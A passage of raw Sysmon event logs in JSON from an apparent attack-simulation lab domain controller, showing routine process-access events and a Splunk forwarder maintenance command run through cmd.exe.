C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.955","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3595,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.955\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.955","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3596,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.955\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.955","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3597,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.955\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.955","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3598,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.955\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1FF6-5F25-0000-0010638B0500}\r\nTargetProcessId: 4336\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.955","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1FF6-5F25-0000-0010638B0500}","TargetProcessId":"4336","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3599,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.959\r\nProcessGuid: {41C8662E-1FF6-5F25-0000-0010128C0500}\r\nProcessId: 5092\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nFileVersion: 8.0.2\r\nDescription: splunk Application\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal check-xml-files --answer-yes --no-prompt \r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3\r\nParentProcessGuid: {41C8662E-1FF6-5F25-0000-0010638B0500}\r\nParentProcessId: 4336\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /c \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\" _internal check-xml-files --answer-yes --no-prompt 2>&1","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.959","ProcessGuid":"{41C8662E-1FF6-5F25-0000-0010128C0500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","FileVersion":"8.0.2","Description":"splunk Application","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal check-xml-files --answer-yes --no-prompt ","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3","ParentProcessGuid":"{41C8662E-1FF6-5F25-0000-0010638B0500}","ParentProcessId":"4336","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /c \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\" _internal check-xml-files --answer-yes --no-prompt 2&gt;&amp;1","EventReceivedTime":"2020-08-01 07:55:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3600,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.955\r\nSourceProcessGUID: {41C8662E-1FF6-5F25-0000-0010638B0500}\r\nSourceProcessId: 4336\r\nSourceThreadId: 5084\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {41C8662E-1FF6-5F25-0000-0010128C0500}\r\nTargetProcessId: 5092\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.955","SourceProcessGUID":"{41C8662E-1FF6-5F25-0000-0010638B0500}","SourceProcessId":"4336","SourceThreadId":"5084","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{41C8662E-1FF6-5F25-0000-0010128C0500}","TargetProcessId":"5092","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3601,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.955\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1FF6-5F25-0000-0010128C0500}\r\nTargetProcessId: 5092\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.955","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1FF6-5F25-0000-0010128C0500}","TargetProcessId":"5092","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:55:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3602,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.955\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.955","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3603,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.955\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 